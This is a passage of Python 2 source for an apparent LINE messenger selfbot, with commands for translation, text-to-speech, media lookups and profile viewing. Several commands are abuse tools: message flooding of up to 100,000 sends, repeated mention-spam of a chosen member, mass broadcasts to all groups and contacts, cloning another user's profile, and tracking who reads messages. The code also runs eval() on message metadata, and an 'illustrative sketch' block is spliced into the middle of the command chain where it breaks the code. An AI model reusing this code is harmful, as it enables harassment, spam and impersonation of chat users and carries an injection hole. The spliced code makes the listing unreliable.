open('sider.json', 'w') as fp: json.dump(wait2, fp, sort_keys=True, indent=4) cl.sendText(msg.to,"จับตาดูคนแอบเรียบร้อย") else: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S') wait2['ROM'][msg.to] = {} with open('sider.json', 'w') as fp: json.dump(wait2, fp, sort_keys=True, indent=4) cl.sendText(msg.to, "จับตาดูคนแอบเรียบร้อย:\n" + datetime.now().strftime('%H:%M:%S')) print wait2 elif "เลิกจับ" == msg.text.lower(): if msg.to not in wait2['readPoint']: cl.sendText(msg.to,"เลิกจับตามองแระ:") else: try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] del wait2['setTime'][msg.to] except: pass cl.sendText(msg.to, "เลิกจับตามองแระ:\n" + datetime.now().strftime('%H:%M:%S')) elif "ขอดู" == 
msg.text.lower(): if msg.to in wait2['readPoint']: if wait2["ROM"][msg.to].items() == []: cl.sendText(msg.to, "Reader:\nNone") else: chiya = [] for rom in wait2["ROM"][msg.to].items(): chiya.append(rom[1]) cmem = cl.getContacts(chiya) zx = "" zxc = "" zx2 = [] xpesan = '' for x in range(len(cmem)): xname = str(cmem[x].displayName) pesan = '' pesan2 = pesan+"@a\n" xlen = str(len(zxc)+len(xpesan)) xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1) zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid} zx2.append(zx) zxc += pesan2 msg.contentType = 0 print zxc msg.text = xpesan+ zxc + "\nBefore: %s\nAfter: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S')) lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')} print lol msg.contentMetadata = lol try: cl.sendMessage(msg) except Exception as error: print error pass else: cl.sendText(msg.to, "Lurking has not been set.") elif "Gbroadcast: " in msg.text: bc = msg.text.replace("Gbroadcast: ","") gid = cl.getGroupIdsJoined() for i in gid: cl.sendText(i, bc) elif "Cbroadcast: " in msg.text: bc = msg.text.replace("Cbroadcast: ","") gid = cl.getAllContactIds() for i in gid: cl.sendText(i, bc) elif "Spam change: " in msg.text: wait["spam"] = msg.text.replace("Spam change: ","") cl.sendText(msg.to,"spam changed") elif "Spam add: " in msg.text: wait["spam"] = msg.text.replace("Spam add: ","") if wait["lang"] == "JP": cl.sendText(msg.to,"spam changed") else: cl.sendText(msg.to,"Done") elif "Spam: " in msg.text: strnum = msg.text.replace("Spam: ","") num = int(strnum) for var in range(0,num): cl.sendText(msg.to, wait["spam"]) elif "Spamtag @" in msg.text: _name = msg.text.replace("Spamtag @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: xname = g.displayName xlen = str(len(xname)+1) msg.contentType = 0 msg.text = "@"+xname+" " msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'} cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) cl.sendMessage(msg) else: pass elif "Spam" in msg.text: txt = msg.text.split(" ") jmlh = int(txt[2]) teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","") tulisan = jmlh * (teks+"\n") if txt[1] == "on": if jmlh <= 100000: for x in range(jmlh): cl.sendText(msg.to, teks) else: cl.sendText(msg.to, "Out of Range!") elif txt[1] == "off": if jmlh <= 100000: cl.sendText(msg.to, tulisan) else: cl.sendText(msg.to, "Out Of Range!") elif ("Micadd " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"][0]["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: mimic["target"][target] = True cl.sendText(msg.to,"Target ditambahkan!") break except: cl.sendText(msg.to,"Fail !") break elif ("Micdel " in msg.text): targets = [] key = eval(msg.contentMetadata["MENTION"]) key["MENTIONEES"][0]["M"] for x in key["MENTIONEES"]: targets.append(x["M"]) for target in targets: try: del mimic["target"][target] cl.sendText(msg.to,"Target dihapuskan!") break except: cl.sendText(msg.to,"Fail !") break elif msg.text in ["Miclist"]: if mimic["target"] == {}: cl.sendText(msg.to,"nothing") else: mc = "Target 
mimic user\n" for mi_d in mimic["target"]: mc += "?? "+cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif "Mimic target " in msg.text: if mimic["copy"] == True: siapa = msg.text.replace("Mimic target ","") if siapa.rstrip(' ') == "me": mimic["copy2"] = "me" cl.sendText(msg.to,"Mimic change to me") elif siapa.rstrip(' ') == "target": mimic["copy2"] = "target" cl.sendText(msg.to,"Mimic change to target") else: cl.sendText(msg.to,"I dont know") elif "Mimic " in msg.text: cmd = msg.text.replace("Mimic ","") if cmd == "on": if mimic["status"] == False: mimic["status"] = True cl.sendText(msg.to,"Reply Message on") else: cl.sendText(msg.to,"Sudah on") elif cmd == "off": if mimic["status"] == True: mimic["status"] = False cl.sendText(msg.to,"Reply Message off") else: cl.sendText(msg.to,"Sudah off") elif "Setimage: " in msg.text: wait["pap"] = msg.text.replace("Setimage: ","") cl.sendText(msg.to, "Pap telah di Set") elif msg.text in ["Papimage","Papim","Pap"]: cl.sendImageWithURL(msg.to,wait["pap"]) elif "Setvideo: " in msg.text: wait["pap"] = msg.text.replace("Setvideo: ","") cl.sendText(msg.to,"Video Has Ben Set To") elif msg.text in ["Papvideo","Papvid"]: cl.sendVideoWithURL(msg.to,wait["pap"]) elif "TL:" in msg.text: if msg.toType == 2: tl_text = msg.text.replace("TL:","") cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"]) #==============================================================================# elif msg.text.lower() == 'mymid': cl.sendText(msg.to,mid) elif "Timeline: " in msg.text: tl_text = msg.text.replace("Timeline: ","") cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"]) elif "Myname: " in msg.text: string = msg.text.replace("Myname: ","") if len(string.decode('utf-8')) <= 10000000000: profile = cl.getProfile() profile.displayName = string cl.updateProfile(profile) cl.sendText(msg.to,"Changed " + string + "") elif "Mybio: " in msg.text: string = msg.text.replace("Mybio: ","") if len(string.decode('utf-8')) <= 10000000000: profile = cl.getProfile() profile.statusMessage = string cl.updateProfile(profile) cl.sendText(msg.to,"Changed " + string) elif msg.text in ["Myname"]: h = cl.getContact(mid) cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName) elif msg.text in ["Mybio"]: h = cl.getContact(mid) cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage) elif msg.text in ["Mypict"]: h = cl.getContact(mid) cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Myvid"]: h = cl.getContact(mid) cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Urlpict"]: h = cl.getContact(mid) cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Mycover"]: h = cl.getContact(mid) cu = cl.channel.getCover(mid) path = str(cu) cl.sendImageWithURL(msg.to, path) elif msg.text in ["Urlcover"]: h = cl.getContact(mid) cu = cl.channel.getCover(mid) path = str(cu) cl.sendText(msg.to, path) elif "Getmid @" in msg.text: _name = msg.text.replace("Getmid @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(msg.to, g.mid) else: pass elif "สอดแนม" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to,"Nama :\n" + 
contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu)) except: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu)) elif "ส่องตัส" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage) except: cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage) elif "ส่องชื่อ" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName) except: cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName) elif "ส่องโปรไฟล" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus try: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) except: pass elif "ส่องคท" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] mmid = cl.getContact(key1) msg.contentType = 13 msg.contentMetadata = {"mid": key1} cl.sendMessage(msg) elif "ส่องรูป @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("ส่องรูป @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendImageWithURL(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Getvid @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Getvid @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendVideoWithURL(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Picturl @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Picturl @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendText(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Getcover @" in msg.text: print "[Command]cover executing" _name = msg.text.replace("Getcover @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == 
g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendImageWithURL(msg.to, path) except Exception as e: raise e print "[Command]cover executed" elif "Coverurl @" in msg.text: print "[Command]cover executing" _name = msg.text.replace("Coverurl @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendText(msg.to, path) except Exception as e: raise e print "[Command]cover executed" elif "Getgrup image" in msg.text: group = cl.getGroup(msg.to) path = "http://dl.profile.line-cdn.net/" + group.pictureStatus cl.sendImageWithURL(msg.to,path) elif "Urlgrup image" in msg.text: group = cl.getGroup(msg.to) path = "http://dl.profile.line-cdn.net/" + group.pictureStatus cl.sendText(msg.to,path) elif "Copy @" in msg.text: if msg.toType == 2: print "[COPY] Ok" _name = msg.text.replace("Copy @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: sendMessage(msg.to, "Not Found...") else: for target in targets: try: cl.cloneContactProfile(target) except Exception as e: print e elif "coppy @" in msg.text: print "[COPY] Ok" _name = msg.text.replace("coppy @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to, "Not Found...") else: for target in targets: try: cl.CloneContactProfile(target) cl.sendText(msg.to, "เลียนแบบสำเร็จ") except Exception as e: print e elif msg.text in ["Mybackup","คืนร่าง"]: try: cl.updateDisplayPicture(backup.pictureStatus) cl.updateProfile(backup) cl.sendText(msg.to, "คืนร่างเรียบร้อย") except Exception as e: cl.sendText(msg.to, str(e)) #==============================================================================# elif "Fancytext: " in msg.text: txt = msg.text.replace("Fancytext: ", "") cl.kedapkedip(msg.to,txt) print "[Command] Kedapkedip" elif "Translate-id " in msg.text: isi = msg.text.replace("Tr-id ","") translator = Translator() hasil = translator.translate(isi, dest='id') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-en " in msg.text: isi = msg.text.replace("Tr-en ","") translator = Translator() hasil = translator.translate(isi, dest='en') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-ar" in msg.text: isi = msg.text.replace("Tr-ar ","") translator = Translator() hasil = translator.translate(isi, dest='ar') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-jp" in msg.text: isi = msg.text.replace("Tr-jp ","") translator = Translator() hasil = translator.translate(isi, dest='ja') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-ko" in msg.text: isi = msg.text.replace("Tr-ko ","") translator = Translator() hasil = translator.translate(isi, dest='ko') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Id@en" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'en' kata = msg.text.replace("Id@en ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % 
(bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO ENGLISH**\n" + "" + result + "\n**SUKSES**") elif "En@id" in msg.text: bahasa_awal = 'en' bahasa_tujuan = 'id' kata = msg.text.replace("En@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM EN**\n" + "" + kata + "\n**TO ID**\n" + "" + result + "\n**SUKSES**") elif "Id@jp" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ja' kata = msg.text.replace("Id@jp ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO JP**\n" + "" + result + "\n**SUKSES**") elif "Jp@id" in msg.text: bahasa_awal = 'ja' bahasa_tujuan = 'id' kata = msg.text.replace("Jp@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@th" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'th' kata = msg.text.replace("Id@th ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----") elif "Th@id" in msg.text: bahasa_awal = 'th' bahasa_tujuan = 'id' kata = msg.text.replace("Th@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@jp" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ja' kata = msg.text.replace("Id@jp ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = 
urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----") elif "Id@ar" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ar' kata = msg.text.replace("Id@ar ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----") elif "Ar@id" in msg.text: bahasa_awal = 'ar' bahasa_tujuan = 'id' kata = msg.text.replace("Ar@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@ko" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ko' kata = msg.text.replace("Id@ko ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----") elif "Ko@id" in msg.text: bahasa_awal = 'ko' bahasa_tujuan = 'id' kata = msg.text.replace("Ko@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif msg.text.lower() == 'welcome': ginfo = cl.getGroup(msg.to) cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name)) jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name)) cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName ) tts = gTTS(text=jawaban1, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif "Say-id " in msg.text: say = msg.text.replace("Say-id ","") lang = 'id' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-en " in msg.text: say = msg.text.replace("Say-en ","") lang = 'en' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-jp " in msg.text: say = msg.text.replace("Say-jp ","") lang = 'ja' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-ar " in msg.text: say = msg.text.replace("Say-ar ","") lang = 'ar' tts = gTTS(text=say, lang=lang) 
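# --- Illustrative sketch (not part of the original flow) ----------------------
# The Id@en / En@id / Id@jp / Jp@id / Id@th / Th@id / Id@ar / Ar@id / Id@ko /
# Ko@id handlers above repeat the same scrape of the mobile Google Translate
# page with different language codes.  The shared step, factored into one
# helper (Python 2, urllib2, same URL and 'class="t0">' marker as those
# handlers):
import urllib2

def translate_scrape(text, src, dest):
    """Scrape translate.google.com/m and return the translated string."""
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (
        src, dest, text.replace(" ", "+"))
    request = urllib2.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
    page = urllib2.urlopen(request).read()
    marker = 'class="t0">'
    result = page[page.find(marker) + len(marker):]
    return result.split("<")[0]
# ------------------------------------------------------------------------------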
tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-ko " in msg.text: say = msg.text.replace("Say-ko ","") lang = 'ko' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Kapan " in msg.text: tanya = msg.text.replace("Kapan ","") jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi") jawaban = random.choice(jawab) tts = gTTS(text=jawaban, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif "Apakah " in msg.text: tanya = msg.text.replace("Apakah ","") jawab = ("Ya","Tidak","Mungkin","Bisa jadi") jawaban = random.choice(jawab) tts = gTTS(text=jawaban, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif 'Youtubemp4 ' in msg.text: try: textToSearch = (msg.text).replace('Youtubemp4 ', "").strip() query = urllib.quote(textToSearch) url = "https://www.youtube.com/results?search_query=" + query response = urllib2.urlopen(url) html = response.read() soup = BeautifulSoup(html, "html.parser") results = soup.find(attrs={'class': 'yt-uix-tile-link'}) ght = ('https://www.youtube.com' + results['href']) cl.sendVideoWithURL(msg.to, ght) except: cl.sendText(msg.to, "Could not find it") elif "ytsearch " in msg.text: query = msg.text.replace("ytsearch ","") with requests.session() as s: s.headers['user-agent'] = 'Mozilla/5.0' url = 'http://www.youtube.com/results' params = {'search_query': query} r = s.get(url, params=params) soup = BeautifulSoup(r.content, 'html5lib') hasil = "" for a in soup.select('.yt-lockup-title > a[title]'): if '&list=' not in a['href']: hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n')) cl.sendText(msg.to,hasil) print '[Command] Youtube Search' elif "Lirik " in msg.text: try: songname = msg.text.lower().replace("Lirik ","") params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'Lyric Lagu (' hasil += song[0] hasil += ')\n\n' hasil += song[5] cl.sendText(msg.to, hasil) except Exception as wak: cl.sendText(msg.to, str(wak)) elif "Wikipedia " in msg.text: try: wiki = msg.text.lower().replace("Wikipedia ","") wikipedia.set_lang("id") pesan="Title (" pesan+=wikipedia.page(wiki).title pesan+=")\n\n" pesan+=wikipedia.summary(wiki, sentences=1) pesan+="\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except: try: pesan="Over Text Limit! Please Click link\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except Exception as e: cl.sendText(msg.to, str(e)) elif "ขอเพลง " in msg.text: try: songname = msg.text.lower().replace("ขอเพลง ","") params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' 
+ urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'This is Your Music\n' hasil += 'Judul : ' + song[0] hasil += '\nDurasi : ' + song[1] hasil += '\nLink Download : ' + song[4] cl.sendText(msg.to, hasil) cl.sendText(msg.to, "Please Wait for audio...") cl.sendAudioWithURL(msg.to, song[4]) except Exception as njer: cl.sendText(msg.to, str(njer)) elif "รูป " in msg.text: search = msg.text.replace("รูป ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass elif "Profileig " in msg.text: try: instagram = msg.text.replace("Profileig ","") response = requests.get("https://www.instagram.com/"+instagram+"?__a=1") data = response.json() namaIG = str(data['user']['full_name']) bioIG = str(data['user']['biography']) mediaIG = str(data['user']['media']['count']) verifIG = str(data['user']['is_verified']) usernameIG = str(data['user']['username']) followerIG = str(data['user']['followed_by']['count']) profileIG = data['user']['profile_pic_url_hd'] privateIG = str(data['user']['is_private']) followIG = str(data['user']['follows']['count']) link = "LinkNya: " + "https://www.instagram.com/" + instagram text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollowerNya : "+followerIG+"\nFollowingNya : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link cl.sendText(msg.to, str(text)) except Exception as e: cl.sendText(msg.to, str(e)) elif "Checkdate " in msg.text: tanggal = msg.text.replace("Checkdate ","") r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal) data=r.text data=json.loads(data) lahir = data["data"]["lahir"] usia = data["data"]["usia"] ultah = data["data"]["ultah"] zodiak = data["data"]["zodiak"] cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============") elif msg.text in ["ปฏิทิน","Time","Waktu"]: timeNow = datetime.now() timeHours = datetime.strftime(timeNow,"(%H:%M)") day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"] hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"] bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"] inihari = datetime.today() hr = inihari.strftime('%A') bln = inihari.strftime('%m') for i in range(len(day)): if hr == day[i]: hasil = hari[i] for k in range(0, len(bulan)): if bln == str(k): blan = bulan[k-1] rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]" cl.sendText(msg.to, rst) #==============================================================================# elif msg.text.lower() == 'ifconfig': botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===") elif msg.text.lower() == 'system': botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===") elif msg.text.lower() == 'kernel': botKernel = 
